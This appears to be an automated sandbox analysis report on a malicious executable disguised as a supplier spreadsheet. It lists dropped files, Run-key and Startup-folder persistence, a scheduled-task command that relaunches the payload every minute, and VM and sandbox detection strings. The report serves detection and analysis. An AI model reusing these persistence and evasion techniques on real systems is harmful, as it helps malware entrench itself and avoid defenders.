                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                                Source: ZMNYQK.lnk.2.dr | LNK file: ..\..\..\..\..\Windata\DELPQB.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exe | File written: C:\Users\user\AppData\Local\Temp\doeVwij.ini
                                Source: Window Recorder | Window detected: More than 3 window changes detected
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                                Source: Supplier 0202AW-PER2 Sheet.exe | Static file information: File size 1685504 > 1048576
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe | Code function: 2_2_00ED20B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00ED20B0
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe | Code function: 2_2_00E005A8 push ss; ret 2_2_00E005A9
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe | Code function: 2_2_00D97795 push ecx; ret 2_2_00D977A8
                                Source: C:\ProgramData\Synaptics\Synaptics.exe | Code function: 3_2_021B45BC pushad ; ret 3_2_021B45D5
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe | Code function: 9_2_009805A8 push ss; ret 9_2_009805A9
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe | Code function: 9_2_00917795 push ecx; ret 9_2_009177A8
                                Source: initial sample | Static PE information: section name: UPX0
                                Source: initial sample | Static PE information: section name: UPX1

                                Persistence and Installation Behavior

                                Source: C:\ProgramData\Synaptics\Synaptics.exe | File created: C:\Users\user\Documents\~$cache1
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe | File created: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe | File created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe | File created: C:\ProgramData\Synaptics\Synaptics.exe
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe | File created: C:\ProgramData\Synaptics\RCXC902.tmp

                                Boot Survival

                                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZMNYQK.lnk
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZMNYQK
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe | Code function: 2_2_00D8F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00D8F78E
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe | Code function: 2_2_00DD7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00DD7F0E
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe | Code function: 9_2_0090F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,9_2_0090F78E
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe | Code function: 9_2_00957F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,9_2_00957F0E
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D91E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00D91E5A
                                Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Window / User API: threadDelayed 5268
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Window / User API: foregroundWindowGot 1562
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeAPI coverage: 6.5 %
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeAPI coverage: 3.8 %
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe TID: 7388 Thread sleep time: -52680s >= -30000s
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7996 Thread sleep count: 49 > 30
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7996 Thread sleep time: -2940000s >= -30000s
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8196 Thread sleep time: -60000s >= -30000s
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe Thread sleep count: Count: 5268 delay: -10
                                Source: Yara matchFile source: 00000007.00000002.2484943427.0000000002F58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.2498031591.0000000004DCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.2488281315.0000000003376000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.2484943427.0000000002F77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: ._cache_Supplier 0202AW-PER2 Sheet.exe PID: 7384, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7548, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ZMNYQK.vbs, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D8DD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00D8DD92
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DC2044
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DC219F
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00DC24A9
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00DB6B3F
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00DB6E4A
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00DBF350
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00DBFDD2
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBFD47 FindFirstFileW,FindClose,2_2_00DBFD47
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00942044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00942044
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0094219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_0094219F
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009424A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_009424A9
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00936B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_00936B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00936E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_00936E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0093F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_0093F350
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0090DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_0090DD92
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0093FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_0093FDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0093FD47 FindFirstFileW,FindClose,9_2_0093FD47
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D8E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_00D8E47B
                                Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                                Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                                Source: Amcache.hve.25.drBinary or memory string: VMware
                                Source: Amcache.hve.25.drBinary or memory string: VMware Virtual USB Mouse
                                Source: Amcache.hve.25.drBinary or memory string: vmci.syshbin
                                Source: Amcache.hve.25.drBinary or memory string: VMware, Inc.
                                Source: Amcache.hve.25.drBinary or memory string: VMware20,1hbin@
                                Source: Amcache.hve.25.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                                Source: Amcache.hve.25.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                Source: Amcache.hve.25.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                                Source: ._cache_Supplier 0202AW-PER2 Sheet.exe, 00000002.00000002.2490118763.0000000001803000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: Amcache.hve.25.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                Source: Amcache.hve.25.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                                Source: Amcache.hve.25.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                                Source: Amcache.hve.25.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                Source: ._cache_Supplier 0202AW-PER2 Sheet.exe, 00000002.00000002.2490118763.0000000001803000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: Amcache.hve.25.drBinary or memory string: vmci.sys
                                Source: Amcache.hve.25.drBinary or memory string: vmci.syshbin`
                                Source: Amcache.hve.25.drBinary or memory string: \driver\vmci,\driver\pci
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                                Source: Amcache.hve.25.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                Source: Amcache.hve.25.drBinary or memory string: VMware20,1
                                Source: Amcache.hve.25.drBinary or memory string: Microsoft Hyper-V Generation Counter
                                Source: Amcache.hve.25.drBinary or memory string: NECVMWar VMware SATA CD00
                                Source: Amcache.hve.25.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                                Source: Amcache.hve.25.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                                Source: Amcache.hve.25.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                                Source: Amcache.hve.25.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                                Source: Amcache.hve.25.drBinary or memory string: VMware PCI VMCI Bus Device
                                Source: Amcache.hve.25.drBinary or memory string: VMware VMCI Bus Device
                                Source: Amcache.hve.25.drBinary or memory string: VMware Virtual RAM
                                Source: Amcache.hve.25.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                                Source: Amcache.hve.25.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                                Source: Amcache.hve.25.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeAPI call chain: ExitProcess graph end nodegraph_2-107682
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeAPI call chain: ExitProcess graph end nodegraph_2-104873
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeProcess information queried: ProcessInformation
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC703C BlockInput,2_2_00DC703C
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D7374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_00D7374E
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DA46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,2_2_00DA46D0
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00ED20B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00ED20B0
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D9A937 GetProcessHeap,2_2_00D9A937
